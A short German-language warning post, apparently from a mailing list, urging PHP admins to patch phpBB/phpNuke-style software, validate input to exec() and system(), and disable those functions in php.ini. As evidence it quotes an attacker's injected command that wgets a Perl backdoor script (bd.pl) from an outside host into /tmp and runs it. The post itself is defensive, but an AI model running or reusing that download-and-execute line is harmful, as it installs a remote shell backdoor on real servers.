你们好,

nur eine Warnung: haltet eure PHP-Software aktuell! Potentielle Löcher
bilden phpBB, phpNuke und ähnliche Ranz-Software! Wenn ihr selber Programme
schreibt, die exec(), system(), include() oder ähnliches benutzen: validiert
die Eingabe vernünftig!

Hintergrund der Sache: es hat jemand geschafft, auf bastet.occuris.de Code
über eine solche Software einzuschleusen:

system("uname -a");
system("cd /tmp;wget http://http://geocities.yahoo.com.br/netbrdial/bd.pl;cd /tmp;perl bd.pl");

Fragt mich nicht, über welche Sicherheitslücke er das geschafft hat, das
habe ich noch nicht entdeckt. Wichtig ist nur der Code von bd.pl -- das ist
ein (recht gut gemachter) telnet-artiger Daemon, mit dem der Angreifer
Shell-Zugriff bekommt. Glücklicherweise ist das System halbwegs
abgesichert, deshalb hat der Angreifer keine weiterführenden Rechte
bekommen. Am besten ist es, derartige Software gar nicht erst einzusetzen!
Und wenn ihr sie einsetzt, deaktiviert per php.ini (disable_functions)
mindestens die Funktionen system, exec, shell_exec, proc_open!

再见,
克里斯蒂安